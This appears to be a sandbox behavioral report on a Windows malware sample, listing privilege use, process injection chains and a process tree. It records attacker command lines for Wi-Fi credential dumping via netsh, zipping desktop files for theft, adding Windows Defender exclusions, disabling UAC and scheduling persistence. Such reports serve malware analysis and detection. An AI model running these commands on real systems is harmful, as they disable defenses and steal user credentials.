4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 60 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 60 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 60 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4460 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 60 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Windows\SysWOW64\rundll32.exe
PID 60 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Windows\SysWOW64\rundll32.exe
PID 60 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Windows\SysWOW64\rundll32.exe
PID 540 wrote to memory of 2864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 540 wrote to memory of 2864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2864 wrote to memory of 1816 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\netsh.exe
PID 2864 wrote to memory of 1816 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\netsh.exe
PID 2864 wrote to memory of 236 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 236 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 60 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 60 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 60 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4416 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2528 wrote to memory of 4956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 2528 wrote to memory of 4956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 2528 wrote to memory of 4956 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 2528 wrote to memory of 2256 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 2528 wrote to memory of 2256 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 60 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 60 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 60 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 232 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 60 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 60 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 60 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 4592 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4592 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 4592 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 60 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 60 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 60 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 4592 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe
PID 4592 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe
PID 4592 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe
PID 60 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 60 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 60 wrote to memory of 8 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe

"C:\Users\Admin\AppData\Local\Temp\fdc8b8226851d803b72dc51e837b0af61ea2dad3796e592f5e66af3f84f83814.exe"

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 800

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\739856679346_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 504

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 492

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"

C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe

"C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"

C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe

"C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main

C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"

C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe

"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"

C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe

"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'

C:\Users\Admin\Pictures\sAelCBqfqmajhvZlFuHhOhBV.exe

"C:\Users\Admin\Pictures\sAelCBqfqmajhvZlFuHhOhBV.exe"

C:\Users\Admin\Pictures\inpZ2sy6FtPiN3iFVSNmtl9m.exe

"C:\Users\Admin\Pictures\inpZ2sy6FtPiN3iFVSNmtl9m.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'

